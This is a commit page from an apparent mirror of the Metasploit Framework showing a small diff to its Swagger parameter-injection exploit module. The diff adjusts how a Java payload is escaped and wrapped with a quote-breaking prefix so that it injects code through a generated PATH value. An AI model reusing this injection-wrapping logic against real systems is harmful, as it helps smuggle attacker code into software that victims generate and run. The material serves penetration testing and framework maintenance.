infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix Java payload generator

bug/bundler_fix
Tod Beardsley 2016-06-23 14:51:26 -05:00
parent 464808d825
commit 08d08d2c95
No known key found for this signature in database
GPG Key ID: BD63D0A3EA19CAAC
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/multi/fileformat/swagger_param_inject.rb
View File

@ -153,12 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote
datastore[payload_loc] = wrapped_payload datastore[payload_loc] = wrapped_payload
when 'java' when 'java'
payload_loc = 'PATH' payload_loc = 'PATH'
payload_prefix = "a\\\"; " payload_prefix = %q{a\\\"; "}
p = payload.encoded.gsub(/<%@page import="/, 'import ') p = payload.encoded.gsub(/<%@page import="/, 'import ')
p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '') p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
p = p.gsub(/"/, '\\"').gsub(/\n/, ' ') p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
wrapped_payload = datastore['PAYLOAD_PREFIX'] + wrapped_payload = datastore['PAYLOAD_PREFIX'] + p
p + datastore['PAYLOAD_SUFFIX']
datastore[payload_loc] = wrapped_payload datastore[payload_loc] = wrapped_payload
end end
else else